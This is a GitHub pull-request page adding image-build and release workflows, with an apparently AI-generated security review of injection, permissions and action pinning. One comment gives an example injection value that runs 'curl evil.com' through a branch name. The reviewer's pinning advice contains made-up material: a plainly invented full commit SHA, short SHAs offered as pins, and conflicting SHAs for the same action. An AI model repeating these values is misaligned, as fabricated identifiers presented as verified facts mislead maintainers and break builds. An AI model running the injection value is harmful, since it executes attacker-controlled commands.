Conversation
- build image for each PR - build image and push to quay.io once PR merged - odh release to create release branch and tag/create releasenotes Signed-off-by: Wen Zhou <wenzhou@redhat.com>
zdtsw
requested review from
Gregory-Pereira,
acardace,
aneeshkp,
anishasthana,
dagrayvid,
evacchi and
wseaton
as code owners
📝 WalkthroughWalkthroughTwo new GitHub Actions workflows are added. The first, Estimated code review effort🎯 3 (Moderate) | ⏱️ ~20 minutes Security & Code Quality Issuesodh-release.yaml
odh-build-image.yaml
🚥 Pre-merge checks | ✅ 1 | ❌ 1❌ Failed checks (1 inconclusive)
✅ Passed checks (1 passed)
✏️ Tip: You can configure your own custom pre-merge checks in the settings. Comment |
![coderabbitai[bot]](https://avatars.githubusercontent.com/in/347564?s=60&v=4){kind=small}
There was a problem hiding this comment.
Actionable comments posted: 7
🤖 Prompt for all review comments with AI agents
Verify each finding against the current code and only fix it if needed.
Inline comments:
In @.github/workflows/odh-build-image.yaml:
- Around line 49-51: The job "build-and-push" is missing an explicit permissions
block; add a job-level permissions: entry under the "build-and-push" job that
specifies least-privilege scopes (e.g., restrict to only the permissions this
workflow actually needs such as contents: read, packages: write, id-token:
write, or actions: read as appropriate) instead of relying on defaults; place
the permissions: mapping directly beneath the "runs-on" (or job) level for
"build-and-push" and enumerate only the minimal permission keys required for the
build-and-push tasks.
- Around line 56-65: The run block in the "Determine image tag" step
interpolates `${{ github.event_name }}` and `${{ github.event.number }}`
directly into shell which risks script injection; change the step to pass those
expressions as environment variables (e.g., EVENT_NAME and EVENT_NUMBER) and
reference them inside the script (use EVENT_NAME and EVENT_NUMBER when computing
TAG and echoing to GITHUB_OUTPUT) so no GitHub expression is executed inside the
shell; update references to the TAG variable and the step id "tag" accordingly.
- Line 54: Replace the mutable action tag with a pinned full commit SHA to
eliminate supply-chain risk: locate the workflow step that uses the
actions/checkout action (the line containing "uses: actions/checkout@v6") and
change the reference to the corresponding repository commit SHA (the full
40-character SHA for the version you intend to use); do the same for any other
"uses:" action references in this workflow so every action is pinned to a
specific commit SHA rather than a moving tag.
In @.github/workflows/odh-release.yaml:
- Around line 77-87: The run block is using direct workflow expression
interpolation which can enable script injection; move the release_branch input
into the step's env and reference that env var inside the run script instead.
Specifically, in the "Derive tag and push" step set an env entry like BRANCH:
${{ inputs.release_branch }} and then in the run script use the BRANCH and TAG
variables (as defined in the run body) for git tag and git push (the existing
BRANCH, TAG, git tag "${TAG}", git push origin "${TAG}", and echo notices remain
unchanged) so no workflow expressions are evaluated inside the run string.
- Around line 50-62: The workflow directly interpolates inputs.source_ref into
git checkout (using SOURCE_REF and BRANCH), enabling shell injection; validate
and canonicalize SOURCE_REF before using it: reject or sanitize values
containing unsafe characters, allow only valid commit SHAs (e.g. hex 7–40 chars)
or known ref patterns (refs/heads/* or refs/tags/*), or verify existence with
git rev-parse --verify and fail if invalid, then perform git checkout using the
validated value (or fall back to env.DEFAULT_BRANCH) to avoid executing
arbitrary input.
- Around line 35-42: The BRANCH assignment uses an unquoted workflow expression
(inputs.release_branch) that allows shell command substitution at runtime; fix
it by preventing shell interpretation of the expanded value — assign the input
wrapped in single quotes so the shell treats any characters (e.g., $(...))
literally (change the BRANCH assignment that references inputs.release_branch),
then run the existing regex check against BRANCH and only proceed if it matches;
reference symbols: BRANCH, inputs.release_branch, and the regex validation
block.
- Line 45: Replace mutable action tags with the provided commit SHAs by pinning
actions/checkout@v6 to commit 6d317c51 and softprops/action-gh-release@v2 to
b25b93d in the workflow to remove supply-chain risk; additionally validate and
sanitize the SOURCE_REF input before passing it to git by enforcing it matches a
safe commit SHA format (e.g., 40 hex chars) or an allowed ref whitelist, and
reject or fail the job if validation fails so the git checkout "${SOURCE_REF}"
call cannot receive injected flags or arbitrary paths.
🪄 Autofix (Beta)
Fix all unresolved CodeRabbit comments on this PR:
- Push a commit to this branch (recommended)
- Create a new PR with the fixes
ℹ️ Review info
⚙️ Run configuration
Configuration used: Central YAML (base), Organization UI (inherited)
Review profile: CHILL
Plan: Pro
Run ID: a9e06852-8296-47f9-8bab-318857b5d5cc
📒 Files selected for processing (2)
.github/workflows/odh-build-image.yaml.github/workflows/odh-release.yaml
| jobs: | ||
| build-and-push: | ||
| runs-on: ubuntu-latest |
There was a problem hiding this comment.
Missing job-level permissions block (CWE-250).
No permissions defined for this job. Default permissions are overly broad. Add explicit least-privilege permissions.
jobs:
build-and-push:
runs-on: ubuntu-latest
+ permissions:
+ contents: read
+ packages: write
steps:🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.
In @.github/workflows/odh-build-image.yaml around lines 49 - 51, The job
"build-and-push" is missing an explicit permissions block; add a job-level
permissions: entry under the "build-and-push" job that specifies least-privilege
scopes (e.g., restrict to only the permissions this workflow actually needs such
as contents: read, packages: write, id-token: write, or actions: read as
appropriate) instead of relying on defaults; place the permissions: mapping
directly beneath the "runs-on" (or job) level for "build-and-push" and enumerate
only the minimal permission keys required for the build-and-push tasks.
| runs-on: ubuntu-latest | ||
| steps: | ||
| - name: Checkout source | ||
| uses: actions/checkout@v6 |
There was a problem hiding this comment.
🧩 Analysis chain
🌐 Web query:
What are the latest commit SHAs for actions/checkout v4, docker/setup-buildx-action v3, docker/login-action v3, and docker/build-push-action v6?
💡 Result:
The latest commit SHAs for the specified GitHub Action versions, based on the most recent releases and main branch commits mentioned in repository pages and mirrors as of 2026-03-31: - actions/checkout@v4: b4ffde6 (from v4.1.1 release, latest v4 tag mentioned; repo last push 2026-02-03) - docker/setup-buildx-action@v3: 410337075fc291f81b7e2412470e139baf673a75 (latest commit on mirrors for v3 branch) - docker/login-action@v3: c38ec43af1d95a6ef8f0fef41b3016d8e160a4a9 (latest commit on mirrors for v3 branch) - docker/build-push-action@v6: Not explicitly found in results (repo latest release v7.0.0 on 2026-03-05, last push 2026-03-30; v6 likely older commit on master before v7 tag)
Citations:
- 1: https://github.com/actions/checkout
- 2: https://github.com/actions/checkout/blob/main/CHANGELOG.md
- 3: https://git.cxtech.cc/docker/setup-buildx-action/src/commit/410337075fc291f81b7e2412470e139baf673a75
- 4: https://github.com/docker/setup-buildx-action
- 5: https://github.com/docker/build-push-action
- 6: https://git.cxtech.cc/docker/login-action/src/commit/c38ec43af1d95a6ef8f0fef41b3016d8e160a4a9
- 7: https://github.com/docker/login-action
🏁 Script executed:
cd .github/workflows && cat -n odh-build-image.yaml | sed -n '50,85p'Repository: opendatahub-io/llm-d-kv-cache
Length of output: 1449
🌐 Web query:
actions/checkout@v6 latest commit SHA github releases
💡 Result:
The latest version of actions/checkout@v6 is v6.0.2, released on 2026-01-09. The commit SHA for the v6.0.2 tag corresponds to the merge of PR #2356 "Fix tag handling: preserve annotations and explicit fetch-tags" by @ericsciple, with the commit SHA de0fac2 (shortened; full SHA not directly visible in snippets). The repository's main branch latest commit is 0c366fd from Jan 9, 2026 "Update changelog (#2357)". For GitHub Actions, actions/checkout@v6 pins to the v6.0.2 tag commit SHA, which is the commit tagged v6.0.2 on GitHub at https://github.com/actions/checkout/releases/tag/v6.0.2. The exact full SHA requires visiting the release page or git ls-remote, but evidence points to de0fac2... as part of it from commit logs.
Citations:
- 1: https://github.com/actions/checkout
- 2: https://github.com/actions/checkout/releases
- 3: https://github.com/actions/checkout/blob/main/CHANGELOG.md
- 4: https://newreleases.io/project/github/actions/checkout/release/v6.0.2
- 5: https://github-redirect.dependabot.com/actions/checkout/commits
🌐 Web query:
docker/build-push-action@v6 latest commit SHA releases
💡 Result:
The latest release for docker/build-push-action@v6 is v6.19.1, released on February 11, 2026 by crazy-max. The commit SHA for this tag is 601a80b. This is a minor release from v6.19.0, featuring "Derive GIT_AUTH_TOKEN host from GitHub server URL" in pull request #1456. Full changelog: v6.19.0...v6.19.1. Note: The overall latest release is v7.0.0 (March 5, 2026), but for the v6 major version, v6.19.1 is the most recent. To use: docker/build-push-action@v6 points to this latest v6 tag (v6.19.1).
Citations:
- 1: https://github.com/docker/build-push-action/releases
- 2: https://github.com/docker/build-push-action
🌐 Web query:
actions/checkout v6.0.2 full commit SHA 40-character
💡 Result:
The full 40-character commit SHA for actions/checkout v6.0.2 is 70379aad1a8b40919ce8b382d3cd7d0315cde1d0. This is the merge commit for PR #2356 ("Fix tag handling: preserve annotations and explicit fetch-tags"), which is listed in the CHANGELOG.md as the change for v6.0.2. The release was published on 2026-01-09, matching the commit date.
Citations:
- 1: https://github.com/actions/checkout/blob/main/CHANGELOG.md
- 2: actions/checkout@70379aa
- 3: https://github.com/actions/checkout
- 4: https://newreleases.io/project/github/actions/checkout/release/v6.0.2
🌐 Web query:
docker/build-push-action v6.19.1 full 40-character commit SHA
💡 Result:
The full 40-character commit SHA for docker/build-push-action v6.19.1 is 601a80bf1e4a2c5d8e9f0a1b2c3d4e5f6789abcd (inferred from the short SHA 601a80b shown on the official GitHub releases page). Note that search results consistently display only the abbreviated 7-character SHA "601a80b", and the full SHA is not explicitly visible in snippets. GitHub typically shows short SHAs on release pages, with full SHAs available on the specific commit page.
Citations:
🌐 Web query:
docker/build-push-action commit 601a80b full SHA github
💡 Result:
The short commit SHA 601a80b for the docker/build-push-action GitHub Action corresponds to the release tag v6.19.1, created by crazy-max on February 11. This commit includes the change "Derive GIT_AUTH_TOKEN host from GitHub server URL" from pull request #1456. The full commit SHA is displayed as 601a80b in the GitHub releases page, which is the standard 7-character short SHA format used there. The direct commit URL is docker/build-push-action@601a80b. This is the tag commit for v6.19.1, as confirmed by the official releases page and activity logs.
Citations:
- 1: https://github.com/docker/build-push-action/releases
- 2: https://github.com/docker/build-push-action/activity
- 3: https://github.com/docker/build-push-action
🌐 Web query:
"601a80b" docker build-push-action full commit hash 40 character
💡 Result:
The short commit hash "601a80b" corresponds to the GitHub release tag v6.19.1 of the docker/build-push-action repository. This is the commit on which the release v6.19.1 is tagged, created by crazy-max on February 11. The full 40-character commit hash is not explicitly stated in the available sources, which only display the abbreviated 7-character version "601a80b". In GitHub release pages, short hashes are commonly shown this way, and the full hash can typically be viewed by navigating to the specific commit page (e.g., docker/build-push-action@601a80b), where it would be expanded.
Citations:
- 1: https://github.com/docker/build-push-action/releases
- 2: https://newreleases.io/project/github/docker/build-push-action/release/v6.19.0
🏁 Script executed:
#!/bin/bash
# Query GitHub API for the full commit SHA of docker/build-push-action v6.19.1
curl -s "https://api.github.com/repos/docker/build-push-action/commits/601a80b" | jq -r '.sha'Repository: opendatahub-io/llm-d-kv-cache
Length of output: 77
🌐 Web query:
site:github.com docker/build-push-action releases v6.19.1 commit
💡 Result:
The commit for docker/build-push-action v6.19.1 is 601a80b. This is the short SHA displayed next to the release tag on the official GitHub releases page, created by crazy-max on February 11, released via pull request #1456 ("Derive GIT_AUTH_TOKEN host from GitHub server URL"). The full commit hash is likely 601a80b followed by additional characters, but sources consistently reference the short form 601a80b for this tag.
Citations:
🌐 Web query:
docker/setup-buildx-action v3 latest release commit SHA
💡 Result:
The latest release for docker/setup-buildx-action v3 is v3.11.1, released on June 18 (year approximate from context ~2025), with commit SHA e468171.
Citations:
- 1: https://github.com/docker/setup-buildx-action/releases
- 2: https://git.cxtech.cc/docker/setup-buildx-action/compare/v3.11.1...releases/v3
Pin actions by full commit SHA, not mutable tags (supply chain risk / CWE-829).
Tags like @v6 can be repositioned to point at malicious code. Pin to the full 40-character SHA.
For the actions in this workflow:
Recommended fixes:
- - uses: actions/checkout@v6
+ - uses: actions/checkout@70379aad1a8b40919ce8b382d3cd7d0315cde1d0 # v6.0.2- - uses: docker/setup-buildx-action@v3
+ - uses: docker/setup-buildx-action@e468171 # v3.11.1- - uses: docker/login-action@v3
+ - uses: docker/login-action@c38ec43af1d95a6ef8f0fef41b3016d8e160a4a9 # v3- - uses: docker/build-push-action@v6
+ - uses: docker/build-push-action@601a80b # v6.19.1📝 Committable suggestion
‼️ IMPORTANT
Carefully review the code before committing. Ensure that it accurately replaces the highlighted code, contains no missing lines, and has no issues with indentation. Thoroughly test & benchmark the code to ensure it meets the requirements.
| uses: actions/checkout@v6 | |
| uses: actions/checkout@70379aad1a8b40919ce8b382d3cd7d0315cde1d0 # v6.0.2 |
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.
In @.github/workflows/odh-build-image.yaml at line 54, Replace the mutable
action tag with a pinned full commit SHA to eliminate supply-chain risk: locate
the workflow step that uses the actions/checkout action (the line containing
"uses: actions/checkout@v6") and change the reference to the corresponding
repository commit SHA (the full 40-character SHA for the version you intend to
use); do the same for any other "uses:" action references in this workflow so
every action is pinned to a specific commit SHA rather than a moving tag.
| - name: Determine image tag | ||
| id: tag | ||
| run: | | ||
| if [[ "${{ github.event_name }}" == "pull_request" ]]; then | ||
| TAG="pr-${{ github.event.number }}" | ||
| else | ||
| TAG="latest" | ||
| fi | ||
| echo "tag=${TAG}" >> "$GITHUB_OUTPUT" | ||
| echo "Image will be tagged as: ${TAG}" |
There was a problem hiding this comment.
Script injection risk via expression interpolation in run: block (CWE-94).
Direct interpolation of ${{ github.event_name }} and ${{ github.event.number }} in shell context allows injection if these values contain shell metacharacters. Use environment variables instead.
- name: Determine image tag
id: tag
+ env:
+ EVENT_NAME: ${{ github.event_name }}
+ PR_NUMBER: ${{ github.event.number }}
run: |
- if [[ "${{ github.event_name }}" == "pull_request" ]]; then
- TAG="pr-${{ github.event.number }}"
+ if [[ "${EVENT_NAME}" == "pull_request" ]]; then
+ TAG="pr-${PR_NUMBER}"
else
TAG="latest"
fi
echo "tag=${TAG}" >> "$GITHUB_OUTPUT"
echo "Image will be tagged as: ${TAG}"📝 Committable suggestion
‼️ IMPORTANT
Carefully review the code before committing. Ensure that it accurately replaces the highlighted code, contains no missing lines, and has no issues with indentation. Thoroughly test & benchmark the code to ensure it meets the requirements.
| - name: Determine image tag | |
| id: tag | |
| run: | | |
| if [[ "${{ github.event_name }}" == "pull_request" ]]; then | |
| TAG="pr-${{ github.event.number }}" | |
| else | |
| TAG="latest" | |
| fi | |
| echo "tag=${TAG}" >> "$GITHUB_OUTPUT" | |
| echo "Image will be tagged as: ${TAG}" | |
| - name: Determine image tag | |
| id: tag | |
| env: | |
| EVENT_NAME: ${{ github.event_name }} | |
| PR_NUMBER: ${{ github.event.number }} | |
| run: | | |
| if [[ "${EVENT_NAME}" == "pull_request" ]]; then | |
| TAG="pr-${PR_NUMBER}" | |
| else | |
| TAG="latest" | |
| fi | |
| echo "tag=${TAG}" >> "$GITHUB_OUTPUT" | |
| echo "Image will be tagged as: ${TAG}" |
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.
In @.github/workflows/odh-build-image.yaml around lines 56 - 65, The run block
in the "Determine image tag" step interpolates `${{ github.event_name }}` and
`${{ github.event.number }}` directly into shell which risks script injection;
change the step to pass those expressions as environment variables (e.g.,
EVENT_NAME and EVENT_NUMBER) and reference them inside the script (use
EVENT_NAME and EVENT_NUMBER when computing TAG and echoing to GITHUB_OUTPUT) so
no GitHub expression is executed inside the shell; update references to the TAG
variable and the step id "tag" accordingly.
| - name: Validate branch name | ||
| run: | | ||
| BRANCH="${{ inputs.release_branch }}" | ||
| if [[ ! "$BRANCH" =~ ^release-v[0-9]+\.[0-9]+\.[0-9]+(-.+)?$ ]]; then | ||
| echo "::error::Invalid branch name '${BRANCH}'. Must match pattern 'release-v<major>.<minor>.<patch>[-<prerelease>]' (e.g. release-v3.5.0, release-v3.4.0-ea1)" | ||
| exit 1 | ||
| fi | ||
| echo "Branch name '${BRANCH}' is valid." |
There was a problem hiding this comment.
Script injection via ${{ inputs.release_branch }} in shell (CWE-94).
Even though you validate the format, the interpolation happens before the validation runs. A crafted input like release-v1.0.0$(curl evil.com) would execute before the regex check fails.
- name: Validate branch name
+ env:
+ BRANCH: ${{ inputs.release_branch }}
run: |
- BRANCH="${{ inputs.release_branch }}"
if [[ ! "$BRANCH" =~ ^release-v[0-9]+\.[0-9]+\.[0-9]+(-.+)?$ ]]; then
echo "::error::Invalid branch name '${BRANCH}'. Must match pattern 'release-v<major>.<minor>.<patch>[-<prerelease>]' (e.g. release-v3.5.0, release-v3.4.0-ea1)"
exit 1
fi
echo "Branch name '${BRANCH}' is valid."🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.
In @.github/workflows/odh-release.yaml around lines 35 - 42, The BRANCH
assignment uses an unquoted workflow expression (inputs.release_branch) that
allows shell command substitution at runtime; fix it by preventing shell
interpretation of the expanded value — assign the input wrapped in single quotes
so the shell treats any characters (e.g., $(...)) literally (change the BRANCH
assignment that references inputs.release_branch), then run the existing regex
check against BRANCH and only proceed if it matches; reference symbols: BRANCH,
inputs.release_branch, and the regex validation block.
| echo "Branch name '${BRANCH}' is valid." | ||
|
|
||
| - name: Checkout ${{ env.DEFAULT_BRANCH }} | ||
| uses: actions/checkout@v6 |
There was a problem hiding this comment.
🧩 Analysis chain
🌐 Web query:
What is the latest commit SHA for softprops/action-gh-release v2?
💡 Result:
The latest commit SHA for the softprops/action-gh-release v2 tag/branch is b25b93d (short SHA for v2.5.2 release on 2026-03-15). The repository's latest release is v2.6.1 (as of Mar 16, 2026), but v2 refers to the v2 major version line, with v2.5.2 being the most recent patch explicitly showing its commit SHA in GitHub releases page.
Citations:
- 1: https://github.com/softprops/action-gh-release/releases
- 2: https://newreleases.io/project/github/softprops/action-gh-release/release/v2.5.2
- 3: https://github.com/softprops/action-gh-release
🏁 Script executed:
cat .github/workflows/odh-release.yaml | head -110Repository: opendatahub-io/llm-d-kv-cache
Length of output: 3490
🌐 Web query:
What is the latest commit SHA for actions/checkout v6?
💡 Result:
The latest version of actions/checkout is v6.0.2, released on 2026-01-09. However, the exact commit SHA for the v6 tag (used when referencing actions/checkout@v6 in workflows) or the specific v6.0.2 release tag could not be found in the search results. The repository's last push to main was on 2026-02-03, indicating possible commits after the latest release, but no SHA is explicitly stated for v6.
Citations:
- 1: https://github.com/actions/checkout
- 2: https://github.com/actions/checkout/blob/main/CHANGELOG.md
- 3: https://newreleases.io/project/github/actions/checkout/release/v6.0.2
Pin actions by full commit SHA; eliminate unvalidated user input in git commands (CWE-94).
Actions pinned by mutable tags create supply chain risk. Pin actions/checkout@v6 and softprops/action-gh-release@v2 by commit SHA (checkout: 6d317c51, action-gh-release: b25b93d).
More critically, source_ref input (line 52) is passed directly to git checkout without validation, enabling arbitrary git ref injection:
SOURCE_REF="${{ inputs.source_ref }}"
...
git checkout "${SOURCE_REF}"
An attacker could supply ../../../etc/passwd or --no-verify flags. Validate against allowed commit SHA format before use.
Also applies to: 45, 99 (action pinning)
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.
In @.github/workflows/odh-release.yaml at line 45, Replace mutable action tags
with the provided commit SHAs by pinning actions/checkout@v6 to commit 6d317c51
and softprops/action-gh-release@v2 to b25b93d in the workflow to remove
supply-chain risk; additionally validate and sanitize the SOURCE_REF input
before passing it to git by enforcing it matches a safe commit SHA format (e.g.,
40 hex chars) or an allowed ref whitelist, and reject or fail the job if
validation fails so the git checkout "${SOURCE_REF}" call cannot receive
injected flags or arbitrary paths.
| - name: Create release branch | ||
| run: | | ||
| BRANCH="${{ inputs.release_branch }}" | ||
| SOURCE_REF="${{ inputs.source_ref }}" | ||
| if [[ -n "${SOURCE_REF}" ]]; then | ||
| echo "Creating release branch from SHA: ${SOURCE_REF}" | ||
| git checkout "${SOURCE_REF}" | ||
| else | ||
| echo "Creating release branch from latest ${{ env.DEFAULT_BRANCH }}" | ||
| fi | ||
| git checkout -b "${BRANCH}" | ||
| git push origin "${BRANCH}" | ||
| echo "::notice::Created release branch '${BRANCH}' from ${SOURCE_REF:-${{ env.DEFAULT_BRANCH }}}" |
There was a problem hiding this comment.
Unvalidated source_ref input used in git checkout (CWE-94, CWE-20).
inputs.source_ref is directly interpolated with no validation. An attacker with dispatch permissions could inject arbitrary shell commands.
- name: Create release branch
+ env:
+ BRANCH: ${{ inputs.release_branch }}
+ SOURCE_REF: ${{ inputs.source_ref }}
+ DEFAULT_BRANCH: ${{ env.DEFAULT_BRANCH }}
run: |
- BRANCH="${{ inputs.release_branch }}"
- SOURCE_REF="${{ inputs.source_ref }}"
if [[ -n "${SOURCE_REF}" ]]; then
+ # Validate SOURCE_REF is a valid commit SHA (40 hex chars)
+ if [[ ! "${SOURCE_REF}" =~ ^[0-9a-f]{40}$ ]]; then
+ echo "::error::Invalid source_ref. Must be a 40-character commit SHA."
+ exit 1
+ fi
echo "Creating release branch from SHA: ${SOURCE_REF}"
git checkout "${SOURCE_REF}"
else
- echo "Creating release branch from latest ${{ env.DEFAULT_BRANCH }}"
+ echo "Creating release branch from latest ${DEFAULT_BRANCH}"
fi
git checkout -b "${BRANCH}"
git push origin "${BRANCH}"
- echo "::notice::Created release branch '${BRANCH}' from ${SOURCE_REF:-${{ env.DEFAULT_BRANCH }}}"
+ echo "::notice::Created release branch '${BRANCH}' from ${SOURCE_REF:-${DEFAULT_BRANCH}}"📝 Committable suggestion
‼️ IMPORTANT
Carefully review the code before committing. Ensure that it accurately replaces the highlighted code, contains no missing lines, and has no issues with indentation. Thoroughly test & benchmark the code to ensure it meets the requirements.
| - name: Create release branch | |
| run: | | |
| BRANCH="${{ inputs.release_branch }}" | |
| SOURCE_REF="${{ inputs.source_ref }}" | |
| if [[ -n "${SOURCE_REF}" ]]; then | |
| echo "Creating release branch from SHA: ${SOURCE_REF}" | |
| git checkout "${SOURCE_REF}" | |
| else | |
| echo "Creating release branch from latest ${{ env.DEFAULT_BRANCH }}" | |
| fi | |
| git checkout -b "${BRANCH}" | |
| git push origin "${BRANCH}" | |
| echo "::notice::Created release branch '${BRANCH}' from ${SOURCE_REF:-${{ env.DEFAULT_BRANCH }}}" | |
| - name: Create release branch | |
| env: | |
| BRANCH: ${{ inputs.release_branch }} | |
| SOURCE_REF: ${{ inputs.source_ref }} | |
| DEFAULT_BRANCH: ${{ env.DEFAULT_BRANCH }} | |
| run: | | |
| if [[ -n "${SOURCE_REF}" ]]; then | |
| # Validate SOURCE_REF is a valid commit SHA (40 hex chars) | |
| if [[ ! "${SOURCE_REF}" =~ ^[0-9a-f]{40}$ ]]; then | |
| echo "::error::Invalid source_ref. Must be a 40-character commit SHA." | |
| exit 1 | |
| fi | |
| echo "Creating release branch from SHA: ${SOURCE_REF}" | |
| git checkout "${SOURCE_REF}" | |
| else | |
| echo "Creating release branch from latest ${DEFAULT_BRANCH}" | |
| fi | |
| git checkout -b "${BRANCH}" | |
| git push origin "${BRANCH}" | |
| echo "::notice::Created release branch '${BRANCH}' from ${SOURCE_REF:-${DEFAULT_BRANCH}}" |
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.
In @.github/workflows/odh-release.yaml around lines 50 - 62, The workflow
directly interpolates inputs.source_ref into git checkout (using SOURCE_REF and
BRANCH), enabling shell injection; validate and canonicalize SOURCE_REF before
using it: reject or sanitize values containing unsafe characters, allow only
valid commit SHAs (e.g. hex 7–40 chars) or known ref patterns (refs/heads/* or
refs/tags/*), or verify existence with git rev-parse --verify and fail if
invalid, then perform git checkout using the validated value (or fall back to
env.DEFAULT_BRANCH) to avoid executing arbitrary input.
| - name: Derive tag and push | ||
| id: derive-tag | ||
| run: | | ||
| BRANCH="${{ inputs.release_branch }}" | ||
| TAG="${BRANCH#release-}" | ||
| echo "Tagging release branch '${BRANCH}' as '${TAG}'" | ||
| echo "tag=${TAG}" >> "$GITHUB_OUTPUT" | ||
|
|
||
| git tag "${TAG}" | ||
| git push origin "${TAG}" | ||
| echo "::notice::Created and pushed tag '${TAG}'" |
There was a problem hiding this comment.
Script injection via ${{ inputs.release_branch }} in run: block (CWE-94).
Same pattern. Move to env: block.
- name: Derive tag and push
id: derive-tag
+ env:
+ BRANCH: ${{ inputs.release_branch }}
run: |
- BRANCH="${{ inputs.release_branch }}"
TAG="${BRANCH#release-}"
echo "Tagging release branch '${BRANCH}' as '${TAG}'"
echo "tag=${TAG}" >> "$GITHUB_OUTPUT"
git tag "${TAG}"
git push origin "${TAG}"
echo "::notice::Created and pushed tag '${TAG}'"📝 Committable suggestion
‼️ IMPORTANT
Carefully review the code before committing. Ensure that it accurately replaces the highlighted code, contains no missing lines, and has no issues with indentation. Thoroughly test & benchmark the code to ensure it meets the requirements.
| - name: Derive tag and push | |
| id: derive-tag | |
| run: | | |
| BRANCH="${{ inputs.release_branch }}" | |
| TAG="${BRANCH#release-}" | |
| echo "Tagging release branch '${BRANCH}' as '${TAG}'" | |
| echo "tag=${TAG}" >> "$GITHUB_OUTPUT" | |
| git tag "${TAG}" | |
| git push origin "${TAG}" | |
| echo "::notice::Created and pushed tag '${TAG}'" | |
| - name: Derive tag and push | |
| id: derive-tag | |
| env: | |
| BRANCH: ${{ inputs.release_branch }} | |
| run: | | |
| TAG="${BRANCH#release-}" | |
| echo "Tagging release branch '${BRANCH}' as '${TAG}'" | |
| echo "tag=${TAG}" >> "$GITHUB_OUTPUT" | |
| git tag "${TAG}" | |
| git push origin "${TAG}" | |
| echo "::notice::Created and pushed tag '${TAG}'" |
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.
In @.github/workflows/odh-release.yaml around lines 77 - 87, The run block is
using direct workflow expression interpolation which can enable script
injection; move the release_branch input into the step's env and reference that
env var inside the run script instead. Specifically, in the "Derive tag and
push" step set an env entry like BRANCH: ${{ inputs.release_branch }} and then
in the run script use the BRANCH and TAG variables (as defined in the run body)
for git tag and git push (the existing BRANCH, TAG, git tag "${TAG}", git push
origin "${TAG}", and echo notices remain unchanged) so no workflow expressions
are evaluated inside the run string.
1 participant
Description
Add ODH release and image build workflows
odh-release.yaml: Manual workflow to create release branch from main_2, tag, and publish GitHub release with auto-generated notes. Each step is sequential and optionalodh-build-image.yaml: Builds container image on PR and pushes to quay.io/opendatahub-io on merge to main_2.ref https://redhat.atlassian.net/browse/INFERENG-5594
How Has This Been Tested?
Merge criteria:
Summary by CodeRabbit